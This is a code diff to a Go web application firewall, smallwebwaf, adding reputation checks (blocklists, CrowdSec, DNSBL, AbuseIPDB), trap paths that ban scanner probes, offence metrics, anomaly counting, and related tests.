processLog := requestlog.NewProcessLogger(out, cfg.InstanceName) processLog := requestlog.NewProcessLogger(out, cfg.InstanceName, cfg.LogLevel)
ruleFiles, err := rules.Load(rules.Params{ ruleFiles, err := rules.Load(rules.Params{
Dir: cfg.RulesDir, Enabled: cfg.RulesEnabled, ProcessLog: processLog, Dir: cfg.RulesDir, Enabled: cfg.RulesEnabled, ProcessLog: processLog,
@@ -315,7 +325,7 @@ func newProxy(
var lookupFile *lookup.File var lookupFile *lookup.File
if cfg.LookupSource == "file" { if cfg.LookupSource == fileSource {
lookupFile, err = lookup.OpenFile(lookup.FileParams{ lookupFile, err = lookup.OpenFile(lookup.FileParams{
Path: cfg.LookupDBPath, Now: now, ProcessLog: processLog, Alerts: alertQueue, Path: cfg.LookupDBPath, Now: now, ProcessLog: processLog, Alerts: alertQueue,
}) })
@@ -329,6 +339,7 @@ func newProxy(
RequestLog: out, RequestLog: out,
ProcessLog: processLog, ProcessLog: processLog,
GeoJSURL: geojsURL, GeoJSURL: geojsURL,
AbuseIPDBURL: abuseIPDBURL,
LookupFile: lookupFile, LookupFile: lookupFile,
Now: now, Now: now,
Rules: ruleFiles, Rules: ruleFiles,
+43
View File
@@ -72,6 +72,49 @@ func TestRateLimitRefusesBeforeTheApp(t *testing.T) {
} }
} }
func TestIPv6GroupPrefixSetsTheClientTheLimitsCount(t *testing.T) {
t.Parallel()
// With SWWAF_IPV6_GROUP_PREFIX at 48, the first two addresses, in two
// /64s of one /48, are one client, and the second's request breaks the
// limit; the third, in the next /48, is another client.
const (
first = "2001:db8:9::1"
second = "2001:db8:9:1::1"
other = "2001:db8:a::1"
)
for _, tc := range []struct {
setting, value string
// status and action are those of the request that breaks the
// limit: a rate limit refuses it, a byte limit passes it on.
status int
action string
}{
{rateLimitPerMinute, "1", http.StatusForbidden, requestlog.ActionRateLimited},
{bytesLimitPerMinute, byteLimit, http.StatusOK, requestlog.ActionForward},
} {
t.Run(tc.setting, func(t *testing.T) {
t.Parallel()
s, _ := startWithAnswers(t, map[string]string{
ipv6GroupPrefix: "48", tc.setting: tc.value,
})
s.get(first, http.StatusOK, requestlog.ActionForward)
line := s.get(second, tc.status, tc.action)
if line.ClientGroup != "2001:db8:9::/48" ||
line.Offence != requestlog.OffenceLimit {
t.Errorf("log line has client_group %q and offence %q, "+
"want 2001:db8:9::/48 and limit", line.ClientGroup, line.Offence)
}
s.get(other, http.StatusOK, requestlog.ActionForward)
})
}
}
func TestRateLimitExemptPathsAreNeitherCountedNorRefused(t *testing.T) { func TestRateLimitExemptPathsAreNeitherCountedNorRefused(t *testing.T) {
t.Parallel() t.Parallel()
+121
View File
@@ -0,0 +1,121 @@
package proxy
import (
"context"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/reputation"
)
// deny is the SWWAF_BLOCKLIST_ACTION and the SWWAF_REPUTATION_ACTION that
// refuses the requests of a client a source lists.
const deny = "deny"
// blocklistDenied notes the blocklists that list the client, as
// noteListed does, and reports whether SWWAF_BLOCKLIST_ACTION, being deny,
// refuses the request. Being limit, it lowers the client's limits instead
// (see limitPercentages), and being log, it does nothing more.
func (rq *request) blocklistDenied() bool {
listedBy := rq.h.lists.ListedBy(rq.client)
rq.blocklisted = len(listedBy) > 0
rq.noteListed(listedBy, "listed by a blocklist")
return rq.blocklisted && rq.h.config.BlocklistAction == deny
}
// crowdSecBanned reports whether a decision of the CrowdSec decision list
// on the client is in force at now. If one is, it notes the list, as
// noteHit does, and bans the client until that decision ends.
func (rq *request) crowdSecBanned(now time.Time) bool {
decision, listed := rq.h.lists.CrowdSecDecision(rq.client, now)
if !listed {
return false
}
rq.noteHit(bans.ReputationHit{Source: rq.h.config.CrowdSecDecisionsURL},
"listed by the CrowdSec decision list")
rq.banForCrowdSec(now, decision)
return true
}
// dnsblDenied notes the DNSBL zones whose verdict lists the client, as
// noteListed does, and reports whether SWWAF_REPUTATION_ACTION, being
// deny, refuses the request. Being limit, it lowers the client's limits
// instead (see limitPercentages), and being log, it does nothing more. A
// zone without a verdict on the client is asked about it in the
// background, and the request does not wait for the answer. ctx is the
// request's own context.
func (rq *request) dnsblDenied(ctx context.Context) bool {
listedBy := rq.h.dnsbl.ListedBy(ctx, rq.client)
rq.dnsblListed = len(listedBy) > 0
rq.noteListed(listedBy, "listed by a DNSBL zone")
return rq.dnsblListed && rq.h.config.ReputationAction == deny
}
// abuseIPDBDenied notes AbuseIPDB, as noteHit does, with the score, when
// its score of the client is a hit, and reports whether
// SWWAF_REPUTATION_ACTION, being deny, refuses the request, as dnsblDenied
// does for a zone. While SWWAF_ABUSEIPDB_KEY is unset it does nothing. A
// client without a score is checked in the background, by the request's
// address, if its history counts an offence, and the request does not
// wait for the answer. The score is then used for each address of the
// client. ctx is the request's own context.
func (rq *request) abuseIPDBDenied(ctx context.Context) bool {
if rq.h.config.AbuseIPDBKey == "" {
return false
}
client := rq.h.clientGroup(rq.client)
held, _ := rq.h.limiter.Client(client)
offender := held.History.Offences != ratelimit.Offences{}
score, hit := rq.h.abuseIPDB.Hit(ctx, client, rq.client, offender)
if !hit {
return false
}
rq.abuseIPDBHit = true
rq.noteHit(bans.ReputationHit{Source: reputation.AbuseIPDBSource, Score: &score},
"scored by AbuseIPDB at or over SWWAF_ABUSEIPDB_MIN_SCORE")
return rq.h.config.ReputationAction == deny
}
// noteListed notes each of sources, the URLs of the blocklists or the
// DNSBL zones, their keys masked, that list the client, as noteHit does,
// with reason.
func (rq *request) noteListed(sources []string, reason string) {
for _, source := range sources {
rq.noteHit(bans.ReputationHit{Source: source}, reason)
}
}
// noteHit adds hit's source, which lists the client, to the log line's
// reputation, and hit to the notes of a ban the request makes, counts the
// source in the metrics, and raises a reputation_hit alert with reason,
// whose detail gives hit's source and score.
func (rq *request) noteHit(hit bans.ReputationHit, reason string) {
detail := map[string]any{"source": hit.Source}
if hit.Score != nil {
detail["score"] = *hit.Score
}
rq.line.Reputation = append(rq.line.Reputation, hit.Source)
rq.reputation = append(rq.reputation, hit)
rq.h.metrics.ReputationHit(hit.Source)
rq.h.alerts.Raise(alerts.Alert{
Event: alerts.EventReputationHit,
Client: rq.client,
Netblock: rq.h.clientGroup(rq.client),
ASN: rq.line.ASN,
ASName: rq.line.ASName,
Country: rq.line.Country,
Reason: reason,
Detail: detail,
})
}
File diff suppressed because it is too large Load Diff
+166 -53
View File
@@ -3,6 +3,7 @@ package proxy
import ( import (
"context" "context"
"errors" "errors"
"io"
"net/http" "net/http"
"net/http/httptrace" "net/http/httptrace"
"net/http/httputil" "net/http/httputil"
@@ -15,6 +16,9 @@ import (
"sync/atomic" "sync/atomic"
"time" "time"
"sneak.berlin/go/smallwebwaf/internal/anomaly"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/config"
"sneak.berlin/go/smallwebwaf/internal/lookup" "sneak.berlin/go/smallwebwaf/internal/lookup"
"sneak.berlin/go/smallwebwaf/internal/ratelimit" "sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/requestlog" "sneak.berlin/go/smallwebwaf/internal/requestlog"
@@ -54,6 +58,24 @@ type request struct {
// what the lookup gave then, the zero Answer while GeoJS had given none. // what the lookup gave then, the zero Answer while GeoJS had given none.
lookedUp bool lookedUp bool
lookupAnswer lookup.Answer lookupAnswer lookup.Answer
// counted is true for a request the rate limits counted, whose bytes
// the byte limits count once it has ended. limitPercent and
// bytesPercent are then its client's limit percentages for the rate
// limits and for the byte limits.
counted bool
limitPercent, bytesPercent percentage
// attack is true for a request that matched a ban rule or asked for a
// trap path, ruleBlocked for one a block rule refused, wafBlocked for
// one the Core Rule Set refused, and tokenRefused for one refused for a
// missing or wrong token, each an offence its client's history counts.
attack, ruleBlocked, wafBlocked, tokenRefused bool
// blocklisted is true once a blocklist is found to list the client,
// dnsblListed once a DNSBL zone's verdict is, and abuseIPDBHit once
// AbuseIPDB's score of it is a hit.
blocklisted, dnsblListed, abuseIPDBHit bool
// reputation is the reputation sources that list the client, for the
// notes of a ban the request makes.
reputation []bans.ReputationHit
start time.Time start time.Time
// checked is when the checks were done, and upstreamStart when the // checked is when the checks were done, and upstreamStart when the
// request was handed to the app. // request was handed to the app.
@@ -65,6 +87,9 @@ type request struct {
refused atomic.Pointer[refusal] refused atomic.Pointer[refusal]
// complete is true once the app's whole answer has been passed on. // complete is true once the app's whole answer has been passed on.
complete bool complete bool
// upgraded is the connection to the app once the app has switched
// protocols, as for a WebSocket, and nil otherwise.
upgraded *upgradedConn
// mu guards what follows. The timeouts run on goroutines of their // mu guards what follows. The timeouts run on goroutines of their
// own, and the transport starts and stops them, and notes the times // own, and the transport starts and stops them, and notes the times
@@ -120,7 +145,7 @@ func (h *handler) newRequest(w http.ResponseWriter, r *http.Request) *request {
RequestID: requestID(r, peerTrusted), RequestID: requestID(r, peerTrusted),
PeerIP: peer.String(), PeerIP: peer.String(),
ForwardedFor: strings.Join(forwardedFor, ", "), ForwardedFor: strings.Join(forwardedFor, ", "),
ClientGroup: clientGroup(client).String(), ClientGroup: h.clientGroup(client).String(),
ContentType: r.Header.Get("Content-Type"), ContentType: r.Header.Get("Content-Type"),
RequestHeaders: requestHeaders(r, h.config.LogRequestHeaders), RequestHeaders: requestHeaders(r, h.config.LogRequestHeaders),
HasAuthorization: len(r.Header.Values("Authorization")) > 0, HasAuthorization: len(r.Header.Values("Authorization")) > 0,
@@ -163,22 +188,29 @@ func requestHeaders(r *http.Request, names []string) map[string]string {
} }
// check is the one place where a request can be refused once its client // check is the one place where a request can be refused once its client
// is known, before its body is read or anything reaches the app. It // is known, before anything reaches the app, and before its body is read,
// returns nil to let the request through. The checks of checkClient come // but for the part the Core Rule Set reads. It returns nil to let the
// first, answered with SWWAF_BAN_RESPONSE, or 403 for a block rule, and // request through. The checks of checkClient come first, answered with
// SWWAF_BAN_RESPONSE, or 403 for a block rule or the Core Rule Set, and
// then the size limit, so that a request the rate limits count is counted // then the size limit, so that a request the rate limits count is counted
// even when it is refused for its size. In observe mode a request // even when it is refused for its size. In observe mode a request
// checkClient refuses goes on to the size limit like any other. ctx is // checkClient refuses goes on to the size limit like any other. A size or
// the request's own context. // time limit the Core Rule Set's reading of the body meets ends the
// request in either mode. ctx is the request's own context.
func (rq *request) check(ctx context.Context) *refusal { func (rq *request) check(ctx context.Context) *refusal {
action := rq.checkClient(ctx) action := rq.checkClient(ctx)
refused := rq.refused.Load()
if refused != nil {
return refused
}
switch { switch {
case action == "": case action == "":
case rq.h.config.Observe: case rq.h.config.Observe:
// The log line names what enforce mode would have done. // The log line names what enforce mode would have done.
rq.line.WouldAction = action rq.line.WouldAction = action
case action == requestlog.ActionRuleBlocked: case action == requestlog.ActionRuleBlocked || action == requestlog.ActionWAFBlocked:
return &refusal{status: http.StatusForbidden, action: action} return &refusal{status: http.StatusForbidden, action: action}
default: default:
return rq.banResponse(action) return rq.banResponse(action)
@@ -201,12 +233,16 @@ func (rq *request) check(ctx context.Context) *refusal {
// client in SWWAF_ALLOW_NETS skips them, and is not looked up. For any // client in SWWAF_ALLOW_NETS skips them, and is not looked up. For any
// other client, SWWAF_DENY_NETS comes first, then a ban on its netblock, // other client, SWWAF_DENY_NETS comes first, then a ban on its netblock,
// so that a client either refuses is not looked up, then the lookup of // so that a client either refuses is not looked up, then the lookup of
// its AS number and country, and then the country lists; a request any of // its AS number and country, then the country lists, then the blocklists,
// them refuses is not counted for the rate limits. Then come the rate // then the CrowdSec decision list, which bans the client it lists, then
// limits, unless the client is in SWWAF_RATE_LIMIT_EXEMPT_NETS or the // the DNSBL zones' verdicts, and then AbuseIPDB's score; a request any of
// them refuses is not counted for the rate limits. Then come the
// rate limits, unless the client is in SWWAF_RATE_LIMIT_EXEMPT_NETS or the
// request's path is exempt under SWWAF_RATE_LIMIT_EXEMPT_PATHS, so that // request's path is exempt under SWWAF_RATE_LIMIT_EXEMPT_PATHS, so that
// every other request is counted, and last the rule files. ctx is the // every other request is counted, each of them by the client's limit
// request's own context. // percentages, then SWWAF_TRAP_PATHS, then the rule files, and last the
// Core Rule Set. A request exempt from the rate limits is exempt from the
// byte limits too. ctx is the request's own context.
func (rq *request) checkClient(ctx context.Context) string { func (rq *request) checkClient(ctx context.Context) string {
cfg := rq.h.config cfg := rq.h.config
if isInside(rq.client, cfg.AllowNets) { if isInside(rq.client, cfg.AllowNets) {
@@ -229,21 +265,48 @@ func (rq *request) checkClient(ctx context.Context) string {
return requestlog.ActionCountryDenied return requestlog.ActionCountryDenied
} }
exempt := isInside(rq.client, cfg.RateLimitExemptNets) || if rq.blocklistDenied() {
pathExempt(rq.in.URL, cfg.RateLimitExemptPaths) return requestlog.ActionDenied
if !exempt && rq.limitBroken(now) { }
if rq.crowdSecBanned(now) {
return requestlog.ActionBanned
}
if rq.dnsblDenied(ctx) || rq.abuseIPDBDenied(ctx) {
return requestlog.ActionDenied
}
rq.counted = !isInside(rq.client, cfg.RateLimitExemptNets) &&
!pathExempt(rq.in.URL, cfg.RateLimitExemptPaths)
if rq.counted {
rq.limitPercent, rq.bytesPercent = rq.limitPercentages()
rq.line.LimitPercent, rq.line.LimitPercentSetting = rq.limitPercent.logged()
rq.line.BytesPercent, rq.line.BytesPercentSetting = rq.bytesPercent.logged()
}
if rq.counted && rq.limitBroken(now) {
return requestlog.ActionRateLimited return requestlog.ActionRateLimited
} }
return rq.checkRules(now) if rq.trapPath(now) {
return requestlog.ActionBanned
} }
// pathExempt reports whether the rate limits leave out a request for u action := rq.checkRules(now)
// because of SWWAF_RATE_LIMIT_EXEMPT_PATHS: whether its path as sent, the if action != "" {
// path the app receives, not percent-decoded, starts with one of return action
// prefixes, so that /%61ssets/x is not under /assets/ for an app whose }
// router matches the path as received. A request whose decoded path
// contains .. anywhere or a backslash, or whose path as sent holds an return rq.checkCoreRuleSet()
}
// pathExempt reports whether a request for u is exempt under prefixes,
// SWWAF_RATE_LIMIT_EXEMPT_PATHS or SWWAF_WAF_EXEMPT_PATHS: whether its
// path as sent, the path the app receives, not percent-decoded, starts
// with one of prefixes, so that /%61ssets/x is not under /assets/ for an
// app whose router matches the path as received. A request whose decoded
// path contains .. anywhere or a backslash, or whose path as sent holds an
// encoded slash (%2F or %2f), never is, since an app may act on it as a // encoded slash (%2F or %2f), never is, since an app may act on it as a
// path outside every prefix: /assets/..%2Flogin as /login, or /assets%2Fx // path outside every prefix: /assets/..%2Flogin as /login, or /assets%2Fx
// as one path segment, as Go's router does. // as one path segment, as Go's router does.
@@ -324,11 +387,18 @@ func (rq *request) modifyResponse(res *http.Response) error {
if res.StatusCode == http.StatusSwitchingProtocols { if res.StatusCode == http.StatusSwitchingProtocols {
// An upgraded connection, such as a WebSocket, is not cut by the // An upgraded connection, such as a WebSocket, is not cut by the
// timeouts. ReverseProxy writes this answer straight to the // timeouts. ReverseProxy writes this answer straight to the
// connection it takes over, not through rq.out. // connection it takes over, not through rq.out, and then copies
// what passes each way through res.Body, the connection to the app.
rq.stopTimers() rq.stopTimers()
rq.out.status = res.StatusCode rq.out.status = res.StatusCode
rq.line.Websocket = true rq.line.Websocket = true
conn, ok := res.Body.(io.ReadWriteCloser)
if ok {
rq.upgraded = &upgradedConn{ReadWriteCloser: conn}
res.Body = rq.upgraded
}
return nil return nil
} }
@@ -431,10 +501,7 @@ func (rq *request) finish() {
line.ResponseContentType = header.Get("Content-Type") line.ResponseContentType = header.Get("Content-Type")
line.CacheControl = header.Get("Cache-Control") line.CacheControl = header.Get("Cache-Control")
line.Location = header.Get("Location") line.Location = header.Get("Location")
line.RequestBytes = rq.requestBytes()
if rq.body != nil {
line.RequestBytes = rq.body.bytes.Load()
}
// limit is the setting whose size or time limit the request passed. // limit is the setting whose size or time limit the request passed.
var limit string var limit string
@@ -491,46 +558,92 @@ func timing(start, end time.Time) *float64 {
} }
// addToHistory adds the request, which has ended, to its client's // addToHistory adds the request, which has ended, to its client's
// history, and then, for a client that was looked up, the lookup // history, and counts its offences in the metrics, and then the lookup's
// database's answer about it, or the answer from GeoJS kept about it, to // answer about the client, as answerAtTheEnd gives it, to that history and
// that history and to the notes of the bans on its netblock: an answer // to the notes of the bans on its netblock: an answer may have come
// may have come before either was there, and one from GeoJS that comes // before either was there, and one from GeoJS that comes later is added
// later is added when it comes. // when it comes.
func (rq *request) addToHistory() { func (rq *request) addToHistory() {
var requestBytes int64
if rq.body != nil {
requestBytes = rq.body.bytes.Load()
}
forwarded := !rq.upstreamStart.IsZero() forwarded := !rq.upstreamStart.IsZero()
group := clientGroup(rq.client) request := ratelimit.Request{
rq.h.limiter.AddToHistory(group, rq.h.now(), ratelimit.Request{
Forwarded: forwarded, Forwarded: forwarded,
Refused: !forwarded && rq.refused.Load() != nil, Refused: !forwarded && rq.refused.Load() != nil,
Status: rq.out.status, Status: rq.out.status,
RequestBytes: requestBytes, RequestBytes: rq.requestBytes(),
ResponseBytes: rq.out.bytes, ResponseBytes: rq.out.bytes,
BrokeLimit: rq.line.Offence == requestlog.OffenceLimit, BrokeLimit: rq.line.Offence == requestlog.OffenceLimit,
}) Attack: rq.attack,
RuleBlocked: rq.ruleBlocked,
if !rq.lookedUp { WAFBlocked: rq.wafBlocked,
return TokenRefused: rq.tokenRefused,
} }
// The lookup database's answer was there at once. rq.h.limiter.AddToHistory(rq.h.clientGroup(rq.client), rq.h.now(), request)
if rq.h.config.LookupSource == "file" { rq.h.metrics.Offences(request)
rq.h.addLookup(rq.lookupAnswer)
return answer, found := rq.answerAtTheEnd()
} if found {
answer, kept := rq.h.geojs.Kept(group)
if kept {
rq.h.addLookup(answer) rq.h.addLookup(answer)
} }
} }
// countAnomalies counts the request, which has ended, and its bytes, as
// countedBytes gives them, for the anomaly thresholds, whatever was done
// with it: a request refused, one from a client in SWWAF_ALLOW_NETS or
// SWWAF_RATE_LIMIT_EXEMPT_NETS, and one for a path in
// SWWAF_RATE_LIMIT_EXEMPT_PATHS are counted too. It is counted for its
// client's AS number when answerAtTheEnd gives one. With every anomaly
// threshold off, the default, it does nothing.
func (rq *request) countAnomalies() {
if !anomalyThresholdsSet(rq.h.config) {
return
}
answer, _ := rq.answerAtTheEnd()
rq.h.anomalies.Count(rq.h.now(), anomaly.Request{
Client: rq.client,
ClientGroup: rq.h.clientGroup(rq.client),
ASN: answer.ASN,
ASName: answer.ASName,
Country: answer.Country,
Bytes: rq.countedBytes(),
})
}
// anomalyThresholdsSet reports whether any anomaly threshold is set.
func anomalyThresholdsSet(cfg *config.Config) bool {
off := anomaly.Thresholds{}
return cfg.AnomalyClient != off || cfg.AnomalyNet != off || cfg.AnomalyASN != off ||
cfg.AnomalyTotal != off || cfg.AnomalyWatch != off
}
// answerAtTheEnd returns, for a client that was looked up, the lookup's
// answer about it as the request ends, and whether there is one: the
// lookup database's, which was there at once, or the one GeoJS has given
// by then, which a request does not wait for unless a setting needs it.
func (rq *request) answerAtTheEnd() (lookup.Answer, bool) {
if !rq.lookedUp {
return lookup.Answer{}, false
}
if rq.h.config.LookupSource == "file" {
return rq.lookupAnswer, true
}
return rq.h.geojs.Kept(rq.h.clientGroup(rq.client))
}
// requestBytes is how many bytes of the request's body have been read.
func (rq *request) requestBytes() int64 {
if rq.body == nil {
return 0
}
return rq.body.bytes.Load()
}
// clientRequestDeadline is when the client must have sent its whole // clientRequestDeadline is when the client must have sent its whole
// request, or zero when SWWAF_CLIENT_REQUEST_TIMEOUT is off. // request, or zero when SWWAF_CLIENT_REQUEST_TIMEOUT is off.
func (rq *request) clientRequestDeadline() time.Time { func (rq *request) clientRequestDeadline() time.Time {
+4 -1
View File
@@ -119,7 +119,10 @@ func wantFullLine(t *testing.T, line logLine) {
ResponseContentType: "text/html", UpstreamStatus: http.StatusFound, ResponseContentType: "text/html", UpstreamStatus: http.StatusFound,
CacheControl: "no-store", Location: "/elsewhere", CacheControl: "no-store", Location: "/elsewhere",
Action: requestlog.ActionForward, Action: requestlog.ActionForward,
Counts: ratelimit.Counts{Minute: 1, Hour: 1, Day: 1}, // Its 3 bytes in and 5 out, each way counted by default.
Counts: ratelimit.Counts{
Minute: 1, Hour: 1, Day: 1, MinuteBytes: 8, HourBytes: 8, DayBytes: 8,
},
}) })
if !reflect.DeepEqual(line.Line, want) { if !reflect.DeepEqual(line.Line, want) {
t.Errorf("log line\n%+v\nwant\n%+v", line.Line, want) t.Errorf("log line\n%+v\nwant\n%+v", line.Line, want)
+5 -1
View File
@@ -5,6 +5,7 @@ import (
"net/netip" "net/netip"
"os" "os"
"path/filepath" "path/filepath"
"reflect"
"slices" "slices"
"testing" "testing"
"time" "time"
@@ -73,7 +74,7 @@ func TestEachRuleAction(t *testing.T) {
} }
got := server.Ledger.Bans(netblock) got := server.Ledger.Bans(netblock)
if len(got) != 1 || got[0] != want { if len(got) != 1 || !reflect.DeepEqual(got[0], want) {
t.Fatalf("bans\n%+v\nwant\n%+v", got, want) t.Fatalf("bans\n%+v\nwant\n%+v", got, want)
} }
@@ -203,6 +204,9 @@ func TestMetricsCountRuleMatchesAndBansForAnAttack(t *testing.T) {
wantMetric(t, metrics, `smallwebwaf_rules_loaded{instance="app"}`, 2) wantMetric(t, metrics, `smallwebwaf_rules_loaded{instance="app"}`, 2)
wantMetric(t, metrics, `smallwebwaf_requests_total{action="rule_blocked",`+ wantMetric(t, metrics, `smallwebwaf_requests_total{action="rule_blocked",`+
`instance="app",status_class="4xx"}`, 1) `instance="app",status_class="4xx"}`, 1)
wantMetric(t, metrics,
`smallwebwaf_offences_total{instance="app",kind="rule_blocked"}`, 1)
wantMetric(t, metrics, `smallwebwaf_offences_total{instance="app",kind="attack"}`, 1)
wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="attack",instance="app"}`, 1) wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="attack",instance="app"}`, 1)
wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 0) wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 0)
wantMetric(t, metrics, `smallwebwaf_permanent_bans{instance="app"}`, 1) wantMetric(t, metrics, `smallwebwaf_permanent_bans{instance="app"}`, 1)
+25 -2
View File
@@ -1,18 +1,38 @@
package proxy package proxy
import ( import (
"slices"
"time" "time"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/requestlog" "sneak.berlin/go/smallwebwaf/internal/requestlog"
"sneak.berlin/go/smallwebwaf/internal/rules" "sneak.berlin/go/smallwebwaf/internal/rules"
) )
// trapPath reports whether the request asks for a path in
// SWWAF_TRAP_PATHS: its path as a path rule sees it, before any decoding
// and without the query, is one of them. Such a request is a clear sign of
// attack, as a ban rule's match is: it bans the client's netblock, or in
// observe mode raises the alert for the ban it would have made.
func (rq *request) trapPath(now time.Time) bool {
path := rules.Path(rq.in)
if !slices.Contains(rq.h.config.TrapPaths, path) {
return false
}
rq.attack = true
rq.banForAttack(now, bans.Notes{TrapPath: path})
return true
}
// checkRules checks the request against the rules of the rule files at // checkRules checks the request against the rules of the rule files at
// now, notes the ids of those it matches in the log line, and returns the // now, notes the ids of those it matches in the log line, and returns the
// action of the rule that refuses it, ActionRuleBlocked for a block rule // action of the rule that refuses it, ActionRuleBlocked for a block rule
// and ActionBanned for a ban rule, or "" when none does. A ban rule bans // and ActionBanned for a ban rule, or "" when none does. A ban rule bans
// the client's netblock for a clear sign of attack, or in observe mode // the client's netblock for a clear sign of attack, or in observe mode
// raises the alert for the ban it would have made. // raises the alert for the ban it would have made. Either rule's match
// is noted as an offence, for the client's history.
func (rq *request) checkRules(now time.Time) string { func (rq *request) checkRules(now time.Time) string {
matched := rq.h.rules.Match(rq.in) matched := rq.h.rules.Match(rq.in)
@@ -28,9 +48,12 @@ func (rq *request) checkRules(now time.Time) string {
// Only the last rule matched can refuse the request. // Only the last rule matched can refuse the request.
switch last := matched[len(matched)-1]; last.Action { switch last := matched[len(matched)-1]; last.Action {
case rules.ActionBlock: case rules.ActionBlock:
rq.ruleBlocked = true
return requestlog.ActionRuleBlocked return requestlog.ActionRuleBlocked
case rules.ActionBan: case rules.ActionBan:
rq.banForAttack(now, last) rq.attack = true
rq.banForAttack(now, bans.Notes{RuleID: last.ID, Target: last.Target})
return requestlog.ActionBanned return requestlog.ActionBanned
default: default:
+1
View File
@@ -144,6 +144,7 @@ func TestRateLimitExemptNetsAreNeitherCountedNorRefused(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, map[string]string{ addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, map[string]string{
trustedProxies: trustLocalhost, trustedProxies: trustLocalhost,
lookupTimeout: "1h",
rateLimitExemptNets: listedAddr + "," + fromKP, rateLimitExemptNets: listedAddr + "," + fromKP,
deniedCountries: "kp", deniedCountries: "kp",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
+115
View File
@@ -0,0 +1,115 @@
package proxy_test
import (
"net/http"
"net/netip"
"reflect"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
// trapPaths is the setting's name, and trapPathList what the tests set it
// to.
const (
trapPaths = "SWWAF_TRAP_PATHS"
trapPathList = "/wp-login.php,/xmlrpc.php"
)
func TestTrapPathBansAsABanRuleDoes(t *testing.T) {
t.Parallel()
const allowed = "192.0.2.60" // in SWWAF_ALLOW_NETS
// A block rule for the same path: the trap path comes first.
s, clk, server := startWithClock(t, "", map[string]string{
trapPaths: trapPathList,
rulesDir: writeRules(t, `wp path block ^/wp-login\.php$`),
allowNets: allowed,
banResponse: "429",
})
start := clk.Now()
// Only the path itself, as the client sent it, is a trap path.
for _, path := range []string{
"/wp-login.php/", "/WP-LOGIN.PHP", "/blog/xmlrpc.php", "/%77p-login.php",
} {
s.request(otherClient, path, http.StatusOK, requestlog.ActionForward)
}
// A client in SWWAF_ALLOW_NETS is not checked.
s.request(allowed, "/xmlrpc.php", http.StatusOK, requestlog.ActionForward)
// The query is not part of the path.
line := s.request(client, "/wp-login.php?redirect_to=x", http.StatusTooManyRequests,
requestlog.ActionBanned)
wantRuleIDs(t, line)
if line.BanExpires != requestlog.FormatTime(start.Add(7*24*time.Hour)) {
t.Errorf("log line has ban_expires %q, want seven days on", line.BanExpires)
}
netblock := netip.MustParsePrefix(client + "/32")
want := bans.Ban{
Netblock: netblock,
Start: start,
Expires: start.Add(7 * 24 * time.Hour),
Cause: bans.CauseAttack,
Reason: "asked for the trap path /wp-login.php",
Notes: bans.Notes{
TrapPath: "/wp-login.php",
Request: bans.Request{
Time: start,
Method: http.MethodGet,
Host: appHost,
Path: "/wp-login.php?redirect_to=x",
Status: http.StatusTooManyRequests,
UserAgent: userAgent,
},
Requests: 1,
},
}
got := server.Ledger.Bans(netblock)
if len(got) != 1 || !reflect.DeepEqual(got[0], want) {
t.Fatalf("bans\n%+v\nwant\n%+v", got, want)
}
// The next request is refused under the ban, and makes it permanent.
line = s.get(client, http.StatusTooManyRequests, requestlog.ActionBanned)
if line.BanExpires != permanent {
t.Errorf("log line has ban_expires %q, want permanent", line.BanExpires)
}
}
func TestTrapPathsNeedNoRuleFiles(t *testing.T) {
t.Parallel()
s, _, _ := startWithClock(t, "", map[string]string{
trapPaths: trapPathList,
"SWWAF_RULES_ENABLED": "false",
})
s.request(client, "/xmlrpc.php", http.StatusForbidden, requestlog.ActionBanned)
}
func TestObserveModeLogsWhatATrapPathWouldDo(t *testing.T) {
t.Parallel()
s, _, server := startWithClock(t, "", map[string]string{
trapPaths: trapPathList,
mode: observe,
})
line := s.request(client, "/xmlrpc.php", http.StatusOK, requestlog.ActionForward)
wantWouldAction(t, line, requestlog.ActionBanned)
// No ban was made.
s.get(client, http.StatusOK, requestlog.ActionForward)
if got := server.Ledger.Snapshot(); len(got) != 0 {
t.Errorf("bans %+v, want none", got)
}
}
+4 -4
View File
@@ -11,7 +11,7 @@ import (
func TestHistoryKeepsEveryRequest(t *testing.T) { func TestHistoryKeepsEveryRequest(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
@@ -53,7 +53,7 @@ func TestHistoryKeepsEveryRequest(t *testing.T) {
func TestLookupReachesTheHistoryOfAClientInTheTable(t *testing.T) { func TestLookupReachesTheHistoryOfAClientInTheTable(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
other := netip.MustParsePrefix("198.51.100.7/32") other := netip.MustParsePrefix("198.51.100.7/32")
start := midnight() start := midnight()
@@ -90,7 +90,7 @@ func TestLookupReachesTheHistoryOfAClientInTheTable(t *testing.T) {
func TestResetKeepsTheHistory(t *testing.T) { func TestResetKeepsTheHistory(t *testing.T) {
t.Parallel() t.Parallel()
limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit}) limiter := ratelimit.New(ratelimit.Limits{PerMinute: limit}, tableSize)
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
@@ -109,7 +109,7 @@ func TestResetKeepsTheHistory(t *testing.T) {
